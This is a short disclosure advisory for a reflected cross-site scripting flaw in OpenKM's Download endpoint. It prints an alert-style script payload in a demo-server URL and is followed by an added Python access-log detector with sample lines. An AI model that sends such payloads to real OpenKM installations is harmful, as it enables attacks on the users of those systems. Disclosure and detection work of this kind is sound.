OpenKM Document Management System Suffers From Cross Site Scripting Attack

http://khalil-shreateh.com/khalil.shtml/images/articles/websites/vulnerabilities/openkm.jpg

Version : <=6.4.17
Software Test : http://demo.openkm.com/OpenKM/login.jsp
Author : Khalil Shreateh
Author Website : http://khalil-shreateh.com
Status : Reported
Report Link : http://issues.openkm.com/view.php?id=3056

Attack Description :

Log in with any user.
Navigate to :
http://demo.openkm.com/OpenKM/frontend/Download?export&uuid=%3Cscript%3Ealert%28%22XSS%20BY%20KHALIL%20SHREATEH\nkhalil-shreateh.com%22%29%3C/script%3E

POC IMAGE : http://khalil-shreateh.com/khalil.shtml/images/articles/websites/vulnerabilities/xss.jpg
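A detection check for the request described above, added here as an example and not part of the original advisory or of OpenKM's code: it scans web access-log lines for requests to /OpenKM/frontend/Download whose decoded uuid parameter is not a canonical UUID. The combined log format, the sample lines and the premise that legitimate uuid values are 36-character UUIDs are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate OpenKM node uuid is a canonical 36-character UUID.
UUID_RE = re.compile(
    r"[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}"
)
# Request line as it appears inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
DOWNLOAD_PATH = "/OpenKM/frontend/Download"


def suspicious_uuids(log_lines):
    """Return (line_number, decoded_uuid) for Download requests whose uuid is not a UUID."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if target.path != DOWNLOAD_PATH:
            continue
        # parse_qs percent-decodes once; keep_blank_values keeps the bare "export" flag.
        params = parse_qs(target.query, keep_blank_values=True)
        for value in params.get("uuid", []):
            if not UUID_RE.fullmatch(value):
                hits.append((number, value))
    return hits


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - alice [01/Jan/2015:10:00:00 +0000] "GET /OpenKM/frontend/Download?export&uuid=0f1e2d3c-4b5a-6978-8796-a5b4c3d2e1f0 HTTP/1.1" 200 5120',
    '192.0.2.11 - bob [01/Jan/2015:10:00:05 +0000] "GET /OpenKM/frontend/Download?export&uuid=%3Cscript%3Ealert%281%29%3C/script%3E HTTP/1.1" 200 312',
    '192.0.2.12 - carol [01/Jan/2015:10:00:09 +0000] "GET /OpenKM/login.jsp HTTP/1.1" 200 2048',
    '192.0.2.13 - dave [01/Jan/2015:10:00:12 +0000] "GET /OpenKM/frontend/Download?uuid=%253Cb%253E HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for number, value in suspicious_uuids(SAMPLE_LOG):
        print(f"line {number}: non-UUID uuid parameter {value!r}")
```

The same allow-list pattern can be enforced server-side before the uuid value is used or echoed; a double-encoded value (the fourth sample line) still fails the check after a single decode.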